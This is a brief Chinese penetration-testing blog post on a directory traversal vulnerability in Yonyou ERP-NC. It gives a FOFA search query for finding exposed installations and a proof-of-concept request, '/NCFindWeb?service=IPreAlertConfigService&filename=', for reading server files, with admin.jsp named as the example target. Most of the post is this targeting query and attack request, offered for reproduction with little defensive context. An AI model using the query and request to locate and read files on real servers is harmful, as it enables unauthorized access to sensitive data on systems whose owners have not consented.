⽤友ERP-NC ⽬录遍历漏洞 剑胆琴心 收录于 渗透测试 2021-04-29 约 98 字 预计阅读 1 分钟 目录 漏洞描述 fofa语法 复现 漏洞描述 ⽤友ERP-NC 存在⽬录遍历漏洞,攻击者可以通过⽬录遍历获取敏感⽂件信息 fofa语法 1 app="⽤友-UFIDA-NC" 复现 POC: 1 /NCFindWeb?service=IPreAlertConfigService&filename= 查看文件(这里以admin.jsp为例): Please enable JavaScript to view the comments powered by Gitalk.